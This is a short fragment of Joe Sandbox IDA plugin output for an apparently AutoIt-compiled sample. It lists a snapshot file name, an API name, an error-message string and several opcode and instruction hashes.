                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message_doexit
                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                    • API String ID: 1993061046-4017498283
                                                                                                                    • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                    • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                                    • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                    • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D